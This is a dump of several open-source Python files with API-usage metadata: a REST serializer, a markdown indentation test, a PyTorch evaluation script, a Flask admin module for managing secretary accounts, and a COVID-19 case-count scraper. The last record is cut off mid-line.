"common.database.Participant.first_name", "line_number": 98, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 98, "usage_type": "name"}, {"api_name": "common.database.Participant.last_name", "line_number": 99, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 99, "usage_type": "name"}, {"api_name": "common.database.Participant.email", "line_number": 100, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 100, "usage_type": "name"}, {"api_name": "common.database.Application.phone_number", "line_number": 101, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 101, "usage_type": "name"}, {"api_name": "sqlalchemy.cast", "line_number": 102, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 102, "usage_type": "argument"}, {"api_name": "sqlalchemy.extract", "line_number": 102, "usage_type": "call"}, {"api_name": "sqlalchemy.func.age", "line_number": 102, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 102, "usage_type": "name"}, {"api_name": "common.database.Application.date_of_birth", "line_number": 102, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 102, "usage_type": "name"}, {"api_name": "common.database.Application.gender", "line_number": 103, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 103, "usage_type": "name"}, {"api_name": "common.database.Application.race_ethnicity", "line_number": 104, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 104, "usage_type": "name"}, {"api_name": "common.database.Application.country", "line_number": 105, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 105, "usage_type": "name"}, {"api_name": "common.database.School.name", "line_number": 106, "usage_type": "attribute"}, {"api_name": "common.database.School", "line_number": 106, "usage_type": "name"}, {"api_name": "common.database.Application.major", "line_number": 107, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 107, "usage_type": "name"}, {"api_name": "common.database.Application.level_of_study", "line_number": 108, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 108, "usage_type": "name"}, {"api_name": "common.database.Application.graduation_year", "line_number": 109, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 109, "usage_type": "name"}, {"api_name": "common.database.Application.hackathons_attended", "line_number": 110, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 110, "usage_type": "name"}, {"api_name": "common.database.Application.portfolio_url", "line_number": 111, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 111, "usage_type": "name"}, {"api_name": "common.database.Application.vcs_url", "line_number": 112, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 112, "usage_type": "name"}, {"api_name": "common.database.Application.share_information", "line_number": 113, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 113, "usage_type": "name"}, {"api_name": "common.database.Participant.checked_in", "line_number": 114, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 114, "usage_type": "name"}, {"api_name": "common.database.Application.status", "line_number": 115, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 115, "usage_type": "name"}]} +{"seq_id": "75041765927", "text": "from rest_framework import serializers\r\nfrom nt_resource.models import CatNormalResource\r\nfrom nt_core.utils import get_current_timestamp\r\n\r\n\r\nclass CatNormalResourceListSerializer(serializers.ModelSerializer):\r\n class Meta:\r\n model = CatNormalResource\r\n fields = '__all__'\r\n\r\n def update(self, instance, validated_data):\r\n instance.appid = validated_data.get('appid', instance.appid)\r\n instance.response_time = validated_data.get(\r\n 'response_time', instance.response_time\r\n )\r\n\r\n instance.update_time = get_current_timestamp()\r\n instance.save()\r\n return instance\r\n", "repo_name": "harvardfly/network_anomaly_detection", "sub_path": "nt_resource/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 639, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 45, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 6, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 6, "usage_type": "name"}, {"api_name": "nt_resource.models.CatNormalResource", "line_number": 8, "usage_type": "name"}, {"api_name": "nt_core.utils.get_current_timestamp", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "44294345628", "text": "\"\"\"\nTest suite to check if the indentation of the .md is mostly correct.\n\"\"\"\nimport glob\nimport os\nimport unittest\n\nimport mkdocs.utils.meta\n\nfrom tests.path_constants import DOCS_DIR\n\n\nclass IndentationTest(unittest.TestCase):\n \"\"\"\n Indentation TestCase Class\n \"\"\"\n\n admonition_prefixes = (\"!!!\", \"???\", \"===\")\n list_prefixes = (\"-\", \"+\", \"*\")\n codeblock_prefix = \"```\"\n\n def test_admonitions_and_lists(self) -> None:\n \"\"\"\n Test that the indentation of admonitions and lists is correct\n \"\"\"\n paths = glob.glob(\"**/*.md\", root_dir=DOCS_DIR, recursive=True)\n for path in paths:\n file_path = os.path.join(DOCS_DIR, path)\n\n with open(file_path, encoding=\"utf-8-sig\") as file:\n source = file.read()\n\n contents, meta = mkdocs.utils.meta.get_data(source)\n\n last_line = \"\"\n inside_admonition = False\n admonition_valid = False\n inside_codeblock = False\n inside_list = False\n\n for n, line in enumerate(contents.split(\"\\n\"), start=1):\n if inside_admonition and admonition_valid:\n if line.lstrip(\" \") == line:\n inside_admonition = False\n\n if inside_admonition and line.strip():\n self.assertTrue(\n len(line) - len(line.lstrip(\" \")) >= 4,\n f\"The admonition content has to start with 4 or more spaces\\n\"\n f\"File: {file_path}\\n\"\n f\"Line:{n}: {line}\",\n )\n admonition_valid = True\n\n if line.startswith(self.admonition_prefixes):\n inside_admonition = True\n admonition_valid = False\n\n if line.startswith(self.codeblock_prefix):\n inside_codeblock = not inside_codeblock\n\n if line.strip() == \"\":\n inside_list = False\n\n # TODO rewrite it someday with regex\n if line.startswith(self.list_prefixes) and not inside_codeblock:\n self.assertTrue(\n len(line) >= 2,\n \"List entries must have content\\n\"\n f\"File: {file_path}\\n\"\n f\"Line:{n}: {line}\",\n )\n if line[1] == \" \":\n self.assertTrue(\n last_line.strip() == \"\"\n or last_line.strip().startswith(self.list_prefixes)\n or last_line.strip().startswith(\"#\")\n or inside_list,\n \"Lists need to have an empty line before them\\n\"\n f\"File: {file_path}\\n\"\n f\"Line:{n}: {line}\",\n )\n inside_list = True\n\n self.assertTrue(\n line[1] == \" \" or (line[0] == \"*\" and line.count(\"*\") % 2 == 0),\n \"List markers need to be separated by a space\\n\"\n f\"File: {file_path}\\n\"\n f\"Line:{n}: '{line}'\",\n )\n\n last_line = line\n\n self.assertTrue(\n not inside_codeblock, f\"File: {file_path} ended without closing a codeblock\"\n )\n\n print(f\"✅Tested {len(paths)} paths\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n", "repo_name": "Gothic-Modding-Community/gmc", "sub_path": "tests/test_indentation.py", "file_name": "test_indentation.py", "file_ext": "py", "file_size_in_byte": 3544, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestCase", "line_number": 13, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 26, "usage_type": "call"}, {"api_name": "tests.path_constants.DOCS_DIR", "line_number": 26, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "tests.path_constants.DOCS_DIR", "line_number": 28, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "mkdocs.utils.meta.utils.meta.get_data", "line_number": 33, "usage_type": "call"}, {"api_name": "mkdocs.utils.meta.utils", "line_number": 33, "usage_type": "attribute"}, {"api_name": "mkdocs.utils.meta", "line_number": 33, "usage_type": "name"}, {"api_name": "unittest.main", "line_number": 102, "usage_type": "call"}]} +{"seq_id": "70200420650", "text": "import os\nimport torch\nimport logging\nimport pdb\n\nfrom torch import nn, optim\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom config.opts import Config\nfrom model.model import *\nfrom model.model_attn import *\nfrom utils.loader import *\nfrom utils.utils import *\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\ndef write_(labels):\n\twith open('data/test.txt', 'r') as f:\n\t\tlines = f.readlines()\n\twith open('data/test_.txt', 'a') as f:\n\t\tf.write('\\t'.join(['id', 'turn1', 'turn2', 'turn3', 'label'])+'\\n')\n\t\tfor i, line in enumerate(lines[1:]):\n\t\t\tline_new = line.strip() + '\\t' + labels[i] + '\\n'\n\t\t\tf.write(line_new)\n\t\n\ndef test_sep(**kwargs):\n\tinput_ = kwargs['input']\n\tmodel = kwargs['model'].to(device)\n\tlmap = kwargs['lmap']\n\tilmap = {v:k for k,v in lmap.items()}\n\n\t# pdb.set_trace()\n\teval_object = Eval(lmap)\n\ttest_data_loader = DataLoader(dataset=input_,\n\t\t\t\t\t\t\t\tbatch_size=32)\n\tresults = []\n\tfor i, batch in enumerate(tqdm(test_data_loader)):\n\t\tinput_feature = [batch['input'][i].to(device) for i in range(len(batch['input']))]\n\t\toutput = model(input_feature)\n\t\tprediction = output.contiguous()\n\t\tprediction = eval_object.decode(prediction)\n\t\tprediction = prediction.cpu().numpy().tolist()\n\t\tresults.extend([ilmap[prediction[i]] for i in range(len(prediction))])\n\twrite_(results)\n\ndef test(**kwargs):\n\tinput_ = kwargs['input']\n\tmodel = kwargs['model']\n\tlmap = kwargs['lmap']\n\teval_object = Eval(lmap)\n\tresults = []\n\tilmap = {v:k for k,v in lmap.items()}\n\tfor idx in trange(len(input_)):\n\n\t\tsequence = torch.from_numpy(input_[idx]['feature']).to(device)\n\t\ttext = input_[idx]['input']\n\t\t# sequence = sequence.permute(1, 0)\n\t\tsequence = torch.unsqueeze(sequence, 0)\n\t\toutput = model(sequence)\n\t\tprediction = output.contiguous()\n\t\t# pdb.set_trace()\n\t\tprediction = eval_object.decode(prediction)\n\n\t\tresults.append(ilmap[prediction.cpu().numpy()[0]])\n\twrite_(results)\n\ndef test_batch(**kwargs):\n\tinput_ = kwargs['input']\n\tmodel = kwargs['model'].to(device)\n\tlmap = kwargs['lamp']\n\tilmap = {v:k for k,v in lmap.items()}\n\t# pdb.set_trace()\n\teval_object = Eval(lmap)\n\ttest_data_loader = DataLoader(dataset=input_,\n\t\t\t\t\t\t\t\tbatch_size=32)\n\tresults = []\n\tfor iteration, batch in enumerate(tqdm(test_data_loader)):\n\t\tinput_feature = batch['feature'].to(device)\n\t\tpdb.set_trace()\n\t\toutput = model(input_feature)\n\t\tprediction = output.contiguous()\n\t\tprediction = eval_object.decode(prediction)\n\t\tresults.extend(ilmap[prediction.cpu().numpy()[0]])\n\twrite_(results)\n\ndef main(**kwargs):\n\topt = Config()\n\topt._parse(kwargs)\n\tpath = opt.path\n\tlmap = opt.lmap\n\tvector_size = '%dd'%opt.inp\n\tdatasets = {} \n\t# datasets['test'] = TweetData_V02(path,'test',lmap, vector_size=vector_size)\n\t\n\tnIn = opt.inp\n\tdatasets = TweetData_V02('data/test.txt', lmap, nIn)\n\tnHidden = opt.hidden\t\n\tnClasses = opt.out\n\tdepth = opt.depth\n\tfilters = opt.filters\n\tseqlen = 156\n\t# model = RCNN_Text(nIn, nHidden).to(device)\n\t# model = Turnip(nIn, nHidden, nClasses, depth).to(device)\n\t# model = RCNN(nIn, nHidden, nClasses, seqlen, filters).cuda()\n\tmodel = RNN_attn(nIn, nHidden, nClasses, depth).to(device)\n\tsave_dir = opt.save_dir\n\t# gmkdir(save_dir)\n\tsave_file = opt.save_file\n\tsavepath = save_dir + '/' + save_file\n\tcheckpoint = torch.load(savepath)\n\tmodel.load_state_dict(checkpoint['state_dict'])\n\ttest_sep(input=datasets,\n\t\tmodel=model,\n\t\tlmap=lmap)\n\nif __name__ == '__main__':\n\timport fire\n\tfire.Fire(main)\n", "repo_name": "Deepayan137/EmoContext", "sub_path": "evaluate.py", "file_name": "evaluate.py", "file_ext": "py", "file_size_in_byte": 3435, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.device", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 15, "usage_type": "attribute"}, {"api_name": "model.model", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 34, "usage_type": "call"}, {"api_name": "model.model", "line_number": 39, "usage_type": "call"}, {"api_name": "model.model", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.unsqueeze", "line_number": 58, "usage_type": "call"}, {"api_name": "model.model", "line_number": 59, "usage_type": "call"}, {"api_name": "model.model", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 74, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 79, "usage_type": "call"}, {"api_name": "model.model", "line_number": 80, "usage_type": "call"}, {"api_name": "config.opts.Config", "line_number": 87, "usage_type": "call"}, {"api_name": "model.model", "line_number": 105, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 110, "usage_type": "call"}, {"api_name": "model.model.load_state_dict", "line_number": 111, "usage_type": "call"}, {"api_name": "model.model", "line_number": 111, "usage_type": "name"}, {"api_name": "model.model", "line_number": 113, "usage_type": "name"}, {"api_name": "fire.Fire", "line_number": 118, "usage_type": "call"}]} +{"seq_id": "12441493421", "text": "from flask.json import jsonify\nfrom app.auth.models import Role, User\nfrom prime_admin.forms import PartnerForm, SecretaryEditForm, SecretaryForm, StudentForm, TeacherForm, TrainingCenterEditForm, TrainingCenterForm\nfrom flask_login import login_required, current_user\nfrom app.admin.templating import admin_render_template, admin_table, admin_edit\nfrom prime_admin import bp_lms\nfrom prime_admin.models import Branch, Secretary\nfrom flask import redirect, url_for, request, current_app, flash\nfrom app import mongo\nfrom datetime import datetime\nfrom config import TIMEZONE\nfrom prime_admin.globals import SECRETARYREFERENCE\n\n\n\n@bp_lms.route('/secretaries')\n@login_required\ndef secretaries():\n return admin_render_template(\n Secretary,\n 'lms/secretaries.html',\n 'learning_management',\n title=\"Secretaries\"\n )\n \n # form = SecretaryForm()\n # _table_data = []\n # secretary_role = Role.objects(name=\"Secretary\").first()\n # _secretaries = User.objects(role=secretary_role)\n # for secretary in _secretaries:\n # _table_data.append((\n # secretary.id,\n # secretary.fname,\n # secretary.lname,\n # secretary.branch.name if secretary.branch is not None else '',\n # secretary.created_by,\n # secretary.created_at_local,\n # secretary.updated_by,\n # secretary.updated_at_local\n # ))\n\n # return admin_table(\n # Secretary,\n # fields=[],\n # form=form,\n # table_data=_table_data,\n # create_button=None,\n # create_url=None,\n # create_modal=False,\n # # create_url='lms.create_secretary',\n # edit_url='lms.edit_secretary',\n # view_modal_url='/learning-management/get-view-secretary-data'\n # )\n\n\n@bp_lms.route('/secretaries/dt', methods=['GET'])\ndef fetch_secretaries_dt():\n draw = request.args.get('draw')\n start, length = int(request.args.get('start')), int(request.args.get('length'))\n search_value = request.args.get(\"search[value]\")\n\n total_records: int\n filtered_records: int\n\n if search_value != '':\n query = list(mongo.db.auth_users.aggregate([\n {\"$match\": {'lname': {'$regex': search_value}, 'role': SECRETARYREFERENCE}},\n {\"$lookup\": {\n 'from': 'lms_branches',\n 'localField': 'branch',\n 'foreignField': '_id',\n 'as': 'branch'\n }\n }]))\n total_records = len(query)\n else:\n query = list(mongo.db.auth_users.aggregate([\n {\"$match\": {'role': SECRETARYREFERENCE}},\n {\"$lookup\": {\n 'from': 'lms_branches',\n 'localField': 'branch',\n 'foreignField': '_id',\n 'as': 'branch'\n }\n },\n {\"$skip\": start},\n {\"$limit\": length},\n ]))\n total_records = mongo.db.auth_users.find({'role': SECRETARYREFERENCE}).count()\n\n filtered_records = len(query)\n \n table_data = []\n \n for data in query:\n lname = data.get('lname', '')\n fname = data.get('fname', '')\n branch = data.get('branch', [{'name': ''}])[0]\n created_by = data.get('created_by', '')\n created_at = data.get('created_at', '')\n updated_by = data.get('updated_by', '')\n updated_at = data.get('updated_at', '')\n \n table_data.append([\n str(),\n lname,\n fname,\n branch['name'],\n created_by,\n created_at,\n updated_by,\n updated_at,\n ])\n\n response = {\n 'draw': draw,\n 'recordsTotal': filtered_records,\n 'recordsFiltered': total_records,\n 'data': table_data,\n }\n\n return jsonify(response)\n\n\n@bp_lms.route('/get-view-secretary-data', methods=['GET'])\n@login_required\ndef get_view_user_data():\n _column, _id = request.args.get('column'), request.args.get('id')\n\n _data = User.objects(id=_id).values_list(_column)\n\n response = jsonify(result=str(_data[0]),column=_column)\n\n if _column == \"branch\" and _data[0] is not None:\n response = jsonify(result=str(_data[0].id),column=_column)\n\n response.headers.add('Access-Control-Allow-Origin', '*')\n response.status_code = 200\n return response\n\n\n@bp_lms.route('/secretaries/create',methods=['GET','POST'])\n@login_required\ndef create_secretary():\n form = SecretaryForm()\n\n if not form.validate_on_submit():\n for key, value in form.errors.items():\n flash(str(key) + str(value), 'error')\n return redirect(url_for('lms.secretaries'))\n\n try:\n secretary = User()\n\n secretary.fname = form.fname.data\n secretary.lname = form.lname.data\n secretary.branch = Branch.objects.get(id=form.branch.data)\n secretary.role = Role.objects(name=\"Secretary\").first()\n secretary.username = form.username.data\n secretary.email = form.email.data if form.email.data != '' else None\n secretary.set_password(\"password\")\n secretary.is_superuser = False\n\n secretary.created_by = \"{} {}\".format(current_user.fname,current_user.lname)\n\n secretary.save()\n\n flash('New Secretary Added Successfully!','success')\n\n except Exception as e:\n flash(str(e),'error')\n \n return redirect(url_for('lms.secretaries'))\n\n\n@bp_lms.route('/secretaries//edit', methods=['GET', 'POST'])\n@login_required\ndef edit_secretary(oid):\n secretary = User.objects.get_or_404(id=oid)\n form = SecretaryEditForm(obj=secretary)\n\n if request.method == \"GET\":\n\n return admin_edit(\n Secretary,\n form,\n 'lms.edit_secretary',\n oid,\n 'lms.secretaries',\n )\n \n if not form.validate_on_submit():\n for key, value in form.errors.items():\n flash(str(key) + str(value), 'error')\n return redirect(url_for('lms.secretaries'))\n \n try:\n secretary.fname = form.fname.data\n secretary.lname = form.lname.data\n secretary.branch = Branch.objects.get(id=form.branch.data)\n secretary.role = Role.objects(name=\"Secretary\").first()\n secretary.username = form.username.data\n secretary.email = form.email.data if form.email.data != '' else None\n secretary.set_updated_at()\n secretary.updated_by = \"{} {}\".format(current_user.fname,current_user.lname)\n \n secretary.save()\n flash('Secretary Updated Successfully!','success')\n\n except Exception as e:\n flash(str(e),'error')\n\n return redirect(url_for('lms.secretaries'))\n", "repo_name": "likes-team/prime-web-admin", "sub_path": "prime_admin/views/secretary.py", "file_name": "secretary.py", "file_ext": "py", "file_size_in_byte": 6702, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "app.admin.templating.admin_render_template", "line_number": 19, "usage_type": "call"}, {"api_name": "prime_admin.models.Secretary", "line_number": 20, "usage_type": "argument"}, {"api_name": "prime_admin.bp_lms.route", "line_number": 16, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms", "line_number": 16, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 17, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 58, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 58, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 59, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 59, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 60, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 60, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 60, "usage_type": "name"}, {"api_name": "app.mongo.db.auth_users.aggregate", "line_number": 66, "usage_type": "call"}, {"api_name": "app.mongo.db", "line_number": 66, "usage_type": "attribute"}, {"api_name": "app.mongo", "line_number": 66, "usage_type": "name"}, {"api_name": "prime_admin.globals.SECRETARYREFERENCE", "line_number": 67, "usage_type": "name"}, {"api_name": "app.mongo.db.auth_users.aggregate", "line_number": 77, "usage_type": "call"}, {"api_name": "app.mongo.db", "line_number": 77, "usage_type": "attribute"}, {"api_name": "app.mongo", "line_number": 77, "usage_type": "name"}, {"api_name": "prime_admin.globals.SECRETARYREFERENCE", "line_number": 78, "usage_type": "name"}, {"api_name": "app.mongo.db.auth_users.find", "line_number": 89, "usage_type": "call"}, {"api_name": "app.mongo.db", "line_number": 89, "usage_type": "attribute"}, {"api_name": "app.mongo", "line_number": 89, "usage_type": "name"}, {"api_name": "prime_admin.globals.SECRETARYREFERENCE", "line_number": 89, "usage_type": "name"}, {"api_name": "flask.json.jsonify", "line_number": 122, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms.route", "line_number": 56, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 128, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 128, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 128, "usage_type": "name"}, {"api_name": "app.auth.models.User.objects", "line_number": 130, "usage_type": "call"}, {"api_name": "app.auth.models.User", "line_number": 130, "usage_type": "name"}, {"api_name": "flask.json.jsonify", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.json.jsonify", "line_number": 135, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms.route", "line_number": 125, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms", "line_number": 125, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 126, "usage_type": "name"}, {"api_name": "prime_admin.forms.SecretaryForm", "line_number": 145, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 149, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 150, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 150, "usage_type": "call"}, {"api_name": "app.auth.models.User", "line_number": 153, "usage_type": "call"}, {"api_name": "prime_admin.models.Branch.objects.get", "line_number": 157, "usage_type": "call"}, {"api_name": "prime_admin.models.Branch.objects", "line_number": 157, "usage_type": "attribute"}, {"api_name": "prime_admin.models.Branch", "line_number": 157, "usage_type": "name"}, {"api_name": "app.auth.models.Role.objects", "line_number": 158, "usage_type": "call"}, {"api_name": "app.auth.models.Role", "line_number": 158, "usage_type": "name"}, {"api_name": "flask_login.current_user.fname", "line_number": 164, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 164, "usage_type": "name"}, {"api_name": "flask_login.current_user.lname", "line_number": 164, "usage_type": "attribute"}, {"api_name": "flask.flash", "line_number": 168, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 171, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 173, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 173, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms.route", "line_number": 142, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms", "line_number": 142, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 143, "usage_type": "name"}, {"api_name": "app.auth.models.User.objects.get_or_404", "line_number": 179, "usage_type": "call"}, {"api_name": "app.auth.models.User.objects", "line_number": 179, "usage_type": "attribute"}, {"api_name": "app.auth.models.User", "line_number": 179, "usage_type": "name"}, {"api_name": "prime_admin.forms.SecretaryEditForm", "line_number": 180, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 182, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 182, "usage_type": "name"}, {"api_name": "app.admin.templating.admin_edit", "line_number": 184, "usage_type": "call"}, {"api_name": "prime_admin.models.Secretary", "line_number": 185, "usage_type": "argument"}, {"api_name": "flask.flash", "line_number": 194, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 195, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 195, "usage_type": "call"}, {"api_name": "prime_admin.models.Branch.objects.get", "line_number": 200, "usage_type": "call"}, {"api_name": "prime_admin.models.Branch.objects", "line_number": 200, "usage_type": "attribute"}, {"api_name": "prime_admin.models.Branch", "line_number": 200, "usage_type": "name"}, {"api_name": "app.auth.models.Role.objects", "line_number": 201, "usage_type": "call"}, {"api_name": "app.auth.models.Role", "line_number": 201, "usage_type": "name"}, {"api_name": "flask_login.current_user.fname", "line_number": 205, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 205, "usage_type": "name"}, {"api_name": "flask_login.current_user.lname", "line_number": 205, "usage_type": "attribute"}, {"api_name": "flask.flash", "line_number": 208, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 211, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 213, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 213, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms.route", "line_number": 176, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms", "line_number": 176, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 177, "usage_type": "name"}]} +{"seq_id": "25955222173", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport datetime, requests, re, os\nfrom num2words import num2words\n\nnumber_dict = {}\nnumber_dict[\"kein\"] = 0\nnumber_dict[\"keine\"] = 0\nnumber_dict[\"keiner\"] = 0\nnumber_dict[\"eine\"] = 1\nnumber_dict[\"einer\"] = 1\n\nfor i in range(1, 501):\n number_dict[ num2words(i, lang='de') ] = i\n \ndef germanWordToInt(w): \n if re.match(\"^[0-9]{1,}$\", w) is not None:\n return int(w)\n else: \n for n in number_dict:\n if ( w.lower() == n ):\n return number_dict[n]\n return False\n \n \ndef getHBNSubPage(url):\n headers = { 'Pragma': 'no-cache', 'Cache-Control': 'no-cache' }\n try:\n r = requests.get('https://www.landkreis-hildburghausen.de' + url.replace(\"&\", \"&\"), headers=headers, allow_redirects=True, timeout=5.0)\n return r.text\n except:\n return False\n \n\ndef getHBNNumbers(url):\n headers = { 'Pragma': 'no-cache', 'Cache-Control': 'no-cache' }\n \n pattern_Subpage = re.compile(r\"([0-9]{1,2}\\.[0-9]{1,2}\\.[0-9]{4,4})\\s*?

.*?Aktuelle\\sFallzahlen.*?

\")\n pattern_date = re.compile(r\"([0-9]{1,})\\.([0-9]{1,}).([0-9]{2,4}),\\s?([0-9]{1,})[\\.:]([0-9]{1,})\") \n \n num_pattern_T = re.compile(r\"\\s([^\\s]*)\\s(?:positiv\\sgetestete\\sPersonen|Personen\\spositiv)\")\n num_pattern_R = re.compile(r\"([^\\.\\s]*)\\sPersonen[^\\.]*?(?:genesen|überstanden)\")\n num_pattern_D = re.compile(r\"\\s([^\\s]*)\\s(?:Todesfall|Todesfälle|Verstorbene|Tote)\")\n \n replace_array = [\"

\", \"

\", \"\", \"\", \"\", \"\", \"\\n\", \"\\t\", \"\\r\" ]\n \n html_replace_dict = {\n \" \": \" \",\n \"ä\": \"ä\",\n \"ö\": \"ö\",\n \"ü\": \"ü\",\n \"Ä\": \"Ä\",\n \"Ö\": \"Ö\",\n \"Ü\": \"Ü\",\n \"ß\": \"ß\"\n }\n \n deceased_cnt = 0\n \n try:\n r = requests.get(url, headers=headers, allow_redirects=True, timeout=5.0)\n \n pmsub = pattern_Subpage.findall( r.text )\n pmsub.reverse() \n \n for pm in pmsub:\n pm_content = getHBNSubPage(pm[1])\n \n for entry in replace_array:\n pm_content = pm_content.replace(entry, \"\")\n \n for entry in html_replace_dict:\n pm_content = pm_content.replace(entry, html_replace_dict[entry])\n \n pd = pattern_date.findall( pm_content )\n \n if ( len(pd) < 1 ):\n continue\n \n timestamp = int(datetime.datetime(int(pd[0][2]), int(pd[0][1]), int(pd[0][0]), int(pd[0][3]) if int(pd[0][3]) < 24 else 23, int(pd[0][4]) ).strftime(\"%s\"))\n \n ps1 = num_pattern_T.findall( pm_content )\n if ( len(ps1) < 0 ):\n continue\n \n num_t = germanWordToInt(ps1[0])\n if num_t is False:\n continue\n \n ps2 = num_pattern_R.findall( pm_content )\n \n num_r = germanWordToInt(ps2[0]) if len(ps2) >= 1 else -1\n if num_r is False:\n num_r = -1\n \n ps3 = num_pattern_D.findall( pm_content )\n num_d = germanWordToInt(ps3[0]) if len(ps3) >= 1 else -1\n if num_d is False: \n num_d = -1\n \n if ( num_d == -1 ):\n num_d = deceased_cnt\n else:\n deceased_cnt = num_d\n \n num_h = -1\n num_s = -1\n \n return [timestamp, num_t, num_r, num_d, num_h, num_s]\n \n except:\n return False \n\n\nif __name__ == \"__main__\":\n \n DATAFILE = os.path.dirname(os.path.realpath(__file__)) + \"/../data/cases_hbn.csv\"\n URL = 'https://www.landkreis-hildburghausen.de/Aktuelles-Covid-19/Aktuelles-zu-Covid-19-im-Landkreis/Aktuelle-Meldungen-aus-dem-Landkreis'\n \n num_latest = getHBNNumbers(URL)\n \n if (num_latest != False) and (num_latest[1] > -1):\n # get old values\n with open(DATAFILE, 'r') as df:\n raw_data = df.read().splitlines()\n last_values = raw_data[-1].split(\",\")[1:6]\n \n # check for changes\n value_changed = False\n for i in enumerate(last_values):\n if ( int(i[1]) != num_latest[i[0]+1] ):\n if ( ( num_latest[i[0]+1] != -1 ) and ( i[0] != 2 ) ):\n value_changed = True\n \n # deceased number is not always included in new reports\n if value_changed:\n num_latest[3] = max(num_latest[3], int(last_values[2]))\n \n if value_changed:\n # write new csv data\n f = open(DATAFILE, 'a')\n f.write(\"%i,%i,%i,%i,%i,%i,%s\\n\" % (num_latest[0], num_latest[1], num_latest[2], num_latest[3], num_latest[4], num_latest[5], URL))\n f.close()\n", "repo_name": "micb25/corona-jena", "sub_path": "crawler/crawler_hbn.py", "file_name": "crawler_hbn.py", "file_ext": "py", "file_size_in_byte": 5061, "program_lang": "python", "lang": "en", "doc_type": "code", 